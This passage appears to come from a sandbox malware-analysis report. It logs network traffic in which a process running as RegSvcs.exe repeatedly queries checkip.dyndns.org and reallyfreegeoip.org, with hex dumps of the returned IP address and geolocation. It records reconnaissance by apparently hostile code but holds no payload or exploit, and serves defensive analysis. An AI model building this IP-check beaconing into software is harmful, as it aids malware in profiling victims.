                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                  Sep 18, 2024 15:26:04.800056934 CEST127OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Sep 18, 2024 15:26:05.072067022 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:04 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.749702132.226.8.169803636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:05.704499006 CEST127OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Sep 18, 2024 15:26:06.548098087 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:06 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.749704132.226.8.169803636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:07.315989017 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Sep 18, 2024 15:26:09.107950926 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:08 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.749706132.226.8.169803636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:09.786983013 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Sep 18, 2024 15:26:10.813437939 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:10 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.749708132.226.8.169803636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:11.410947084 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Sep 18, 2024 15:26:12.510083914 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:12 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.749710132.226.8.169803636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:13.114567041 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Sep 18, 2024 15:26:14.195511103 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:14 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.749712132.226.8.169803636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:15.117073059 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Sep 18, 2024 15:26:16.954744101 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:16 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.749713132.226.8.169806480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:15.709748983 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Sep 18, 2024 15:26:16.720835924 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:16 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                  Sep 18, 2024 15:26:16.724096060 CEST127OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Sep 18, 2024 15:26:17.050405025 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:16 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                  Sep 18, 2024 15:26:17.734843016 CEST127OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Sep 18, 2024 15:26:18.010059118 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:17 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.749718132.226.8.169803636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:17.620682001 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Sep 18, 2024 15:26:20.705919981 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:19 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                  Sep 18, 2024 15:26:20.706355095 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:19 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                  Sep 18, 2024 15:26:20.706764936 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:19 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.749722132.226.8.169806480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:18.631155968 CEST127OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Sep 18, 2024 15:26:19.577594995 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:19 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.749725132.226.8.169806480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:20.873878956 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Sep 18, 2024 15:26:23.318131924 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:23 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.749728132.226.8.169806480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:23.978149891 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Sep 18, 2024 15:26:25.426209927 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:25 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.749730132.226.8.169806480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:26.041965008 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Sep 18, 2024 15:26:27.814801931 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:27 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.749733132.226.8.169806480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:28.448720932 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Sep 18, 2024 15:26:30.499630928 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:30 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.749735132.226.8.169806480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:31.112776041 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Sep 18, 2024 15:26:31.914226055 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:31 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.749737132.226.8.169806480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 18, 2024 15:26:32.551311016 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Sep 18, 2024 15:26:34.453485966 CEST272INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:34 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.749700188.114.96.34433636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:04 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:04 UTC718INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:04 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78315
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nmXFJcnY5cCFIWEmFHPJ3mog9%2BFsfz7g0UQeCp6Sy3HB%2F0Klxf2HsKYp%2BGPQ0z8m4nKw1maOMFwpWPLmrY%2BYM3%2B58DXurj%2FQKKH%2F%2B8%2Bg6016ApRTqYyrLK6e6MIZHGztb8wguted"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aa678eaf0c84-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:04 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


